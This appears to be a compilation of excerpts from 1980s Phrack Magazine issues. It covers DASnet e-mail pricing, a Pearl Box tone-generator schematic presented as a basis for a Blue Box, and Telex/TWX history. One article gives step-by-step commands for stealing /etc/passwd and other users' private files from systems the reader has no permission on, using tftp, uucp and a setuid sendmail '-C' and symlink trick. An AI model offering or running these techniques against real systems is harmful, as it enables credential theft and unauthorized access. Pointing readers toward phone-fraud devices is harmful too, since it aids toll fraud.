networks that are interconnected with DASnet. One of the drawbacks, though, is that,
after being subscribed to these services, you must then subscribe to DASnet, which is a
separate cost. Members of Wide-Area networks can subscribe to DASnet too. Some of
the networks and systems reachable through DASnet include the following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES,
EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal
Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex,
TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and ".EDU" etc.).
New systems are added all of the time. As of the writing of this file, Connect, GoverNET,
MacNET, and The American Institute of Physics PI-MAIL are soon to be connected.
You can get various accounts on DASnet including:
Corporate Accounts -- If your organization wants more than one individual
subscription.
Site Subscriptions -- If you want DASnet to link directly to your organization's
electronic mail system.
To send e-mail through DASnet, you send the message to the DASnet account on your
home system. You receive e-mail at your mailbox, as you do now. On the Wide-Area
Networks, you send mail to [email protected]. On the Subject: line, you type
the DASnet address in brackets and then the username just outside of them. The real
subject can be expressed after the username separated by a "!" (Example: Subject:
[0756TK]randy!How's Phrack?).
The only disadvantage of using DASnet as opposed to Wide-Area networks is the cost.
Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month for hosts that
are outside of the USA
You are also charged for each message that you send. If you are corresponding with
someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your account.
The following is an abbreviated cost list for mailing to the different services of DASnet:
PARTIAL List DASnet Cost DASnet Cost
of Services 1st 1000 Each Additional 1000
Linked by DASnet (e-mail) Characters Characters:
INET, MacNET, PeaceNet, NOTE: 20 lines
Unison, UUCP*, Domains, .21 .11 of text is app.
e.g. .COM, .EDU* 1000 characters.
Dialcom--Any "host" in US .36 .25
Dialcom--Hosts outside US .93 .83
EasyLink (From EasyLink) .21 .11
(To EasyLink) «5 .23
US FAX (international avail.) .79 .37
GeoMail--Any "host" in US .21 .11
GeoMail--Hosts outside US .74 .63
MCI (from MCI) .21 .11
(to MCI) .78 .25
(Paper mail - USA) 2.31 .21
Telemail .36 .25
W.U. Telex--United States 1.79 1.63
(You can also send Telexes outside the US)
TWICS--Japan .89 .47
* The charges given here are to the gateway to the network. The DASnet user is not
charged for transmission on the network itself.
Subscribers to DASnet get a free DASnet Network Directory as well as a listing in the
directory, and the ability to order optional DASnet services like auto-porting or DASnet
Telex Service which gives you your own Telex number and answerback for $8.40 a month
at this time.
DASnet is a registered trademark of DA Systems, Inc.
DA Systems, Inc.
1503 E. Campbell Ave.
Campbell, CA 95008
408-559-7434
TELEX: 910 380-3530
The following two sections on PeaceNet and AppleLink are in association with DASnet as
this network is what is used to connect.
125. Phrack Magazine - Vol. 3, Issue 28 by Dispater
Introduction:
After reading the earlier renditions of schematics for the Pearl Box, I decided that there
was an easier and cheaper way of doing the same thing with an IC and parts you probably
have just laying around the house.
What Is A Pearl Box and Why Do I Want One?
A Pearl Box is a tone generating device that is used to make a wide range of single tones.
Therefore, it would be very easy to modify this basic design to make a Blue Box by making
2 Pearl Boxes and joining them together in some fashion.
A Pearl Box can be used to create any tone you wish that other boxes may not. It also has
a tone sweep option that can be used for numerous things like detecting different types of
phone tapping devices.
Parts List:
CD4049 RCA integrated circuit
.1 uF disk capacitor
1 uF 16V electrolitic capacitor
1K resistor
10M resistor
1Meg pot
1N914 diode
Some SPST momentary push-button switches
1 SPDT toggle switch
9 Volt battery & clip and miscellaneous stuff you should have laying around the house.
State-of-the-Art-Text Schematic:
+ 16V 1uF -
_______________________________||_____
| ! ! || | _
| _______________________ |__________| |/| 8ohms
____|__|_____:__|__:__|_ | __________| | |
| 9 10 11 12 13 14 15 16 | | | |_|\|
| CD4049UBE | | |
|_1__2__3__4__5__6__7__8_| : | _
| | |__| |__| | |____________________|_________[-]
| | ! ! : [b]
| |__________________________| [a]
| : : | [t]
| ! 1N914 ! ! [t]
|___________|/|_____________________________________[+]
: |\| : :
| | |
| 10M | |
|___/\/\/\__| |
| | |
|_____||____| | <-- These 2 wires to the center pole
|| | | of switch.
.1uF 50V | |
| |
_______________________| |_____________________________
| ___[Toggle Switch]____________ |
| | | ___ |
| | | o o |
| | | /\/\/\___| |__|
|_/\/\/\____/\/\/\ | | ^ |
1K ^ | |____| ___ |
|___| | o o |
| /\/\/\___| |__|
126. Phrack Magazine - Vol. 3, Issue 28 by Dark OverLord
There are many ways of getting copies of files from a remote system that you do not have
permission to read or an account on login on to and access them through. Many
administrators do not even bother to restrict many access points that you can use.
Here are the simplest ways:
Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if you are running on
an Internet based network.
Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if uucp connections
are running on that system.
Access one of many known security loopholes.
In the following examples, we will use the passwd file as the file to acquire since it is a
readable file that can be found on most systems that these attacks are valid on.
Method A :
First start the tftp program:
Enter the command:
tftp
[You have the following prompt:]
tftp>
The next step is to connect to the system that you wish to retrieve files from. At the
tftp, type:
tftp> connect other.system.com
Now request the file you wish to get a copy of (in our case, the passwd file /etc/passwd ):
tftp> get /etc/passwd /tmp/passwd
[You should see something that looks like the following:]
Received 185659 bytes in 22 seconds.
Now exit the tftp program with the "quit" command:
tftp> quit
You should now have a copy of other.system.com's passwd file in your directory.
NOTE: Some Unix systems' tftp programs have a different syntax. The above was tested
under SunOS 4.0
For example, on Apollos, the syntax is:
tftp -{g|g!|p|r|w}
Thus you must use the command:
tftp -g password_file networked-host /etc/passwd
Consult your local "man" pages for more info (or in other words RTFM).
At the end of this article, I will include a shell script that will snarf a password file from a
remote host. To use it type:
gpw system_name
Method B :
Assuming we are getting the file /etc/passwd from the system uusucker, and our system
has a direct uucp connection to that system, it is possible to request a copy of the file
through the uucp links. The following command will request that a copy of the passwd file
be copied into uucp's home directory /usr/spool/uucppublic :
uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
The flag "-m" means you will be notified by mail when the transfer is completed.
Method C:
The third possible way to access the desired file requires that you have the login
permission to the system.
In this case we will utilize a well-known bug in Unix's sendmail daemon.
The sendmail program has and option "-C" in which you can specify the configuration file to
use (by default this file is /usr/lib/sendmail.cf or /etc/sendmail.cf). It should also be
noted that the diagnostics outputted by sendmail contain the offending lines of text. Also
note that the sendmail program runs setuid root.
The way you can abuse this set of facts (if you have not yet guessed) is by specifying the
file you wish read as the configuration file. Thus the command:
sendmail -C/usr/accounts/random_joe/private/file
Will give you a copy of random joe's private file.
Another similar trick is to symlink your .mailcf file to joe's file and mail someone. When
mail executes sendmail (to send the mail), it will load in your mailcf and barf out joe's
stuff.
First, link joe's file to your .mailcf .
ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
Next, send mail to someone.
mail [email protected]
127.Phrack Magazine - Vol. 3, Issue 30 by Phone Phanatic
"Until a few years ago -- maybe ten -- it was very common to
see TWX and Telex machines in almost every business place."
There were only minor differences between Telex and TWX. The biggest difference was
that the former was always run by Western Union, while the latter was run by the Bell
System for a number of years. TWX literally meant "(T)ype(W)riter e(x)change," and it
was Bell's answer to competition from Western Union. There were "three row" and "four
row" machines, meaning the number of keys on the keyboard and how they were laid out.
The "three row" machines were simply part of the regular phone network; that is, they
could dial out and talk to another TWX also connected on regular phone lines.
Eventually these were phased out in favor of "newer and more improved" machines with
additional keys, as well as a paper tape reader attachment which allowed sending the same
message repeatedly to many different machines. These "four row" machines were not on
the regular phone network, but were assigned their own area codes (410-510-610-710-810-
910) where they still remain today. The only way a four row machine could call a three row
machine or vice-versa was through a gateway of sorts which translated some of the
character set unique to each machine.
Western Union's network was called Telex and in addition to being able to contact (by dial
up) other similar machines, Telex could connect with TWX (and vice-versa) as well as all
the Western Union public offices around the country. Until the late 1950's or early
1960's, every small town in America had a Western Union office. Big cities like Chicago
had perhaps a dozen of them, and they used messengers to hand deliver telegrams around
town. Telegrams could be placed in person at any public office, or could be called in to the
nearest public office.
By arrangement with most telcos, the Western Union office in town nearly always had the
phone number 4321, later supplemented in automated exchanges with some prefix XXX-
4321. Telegrams could be charged to your home phone bill (this is still the case in some
communities) and from a coin phone, one did not ask for 4321, but rather, called the
operator and asked for Western Union. This was necessary since once the telegram had
been given verbally to the wire clerk, s/he in turn had to flash the hook and get your
operator back on the line to tell them "collect five dollars and twenty cents" or whatever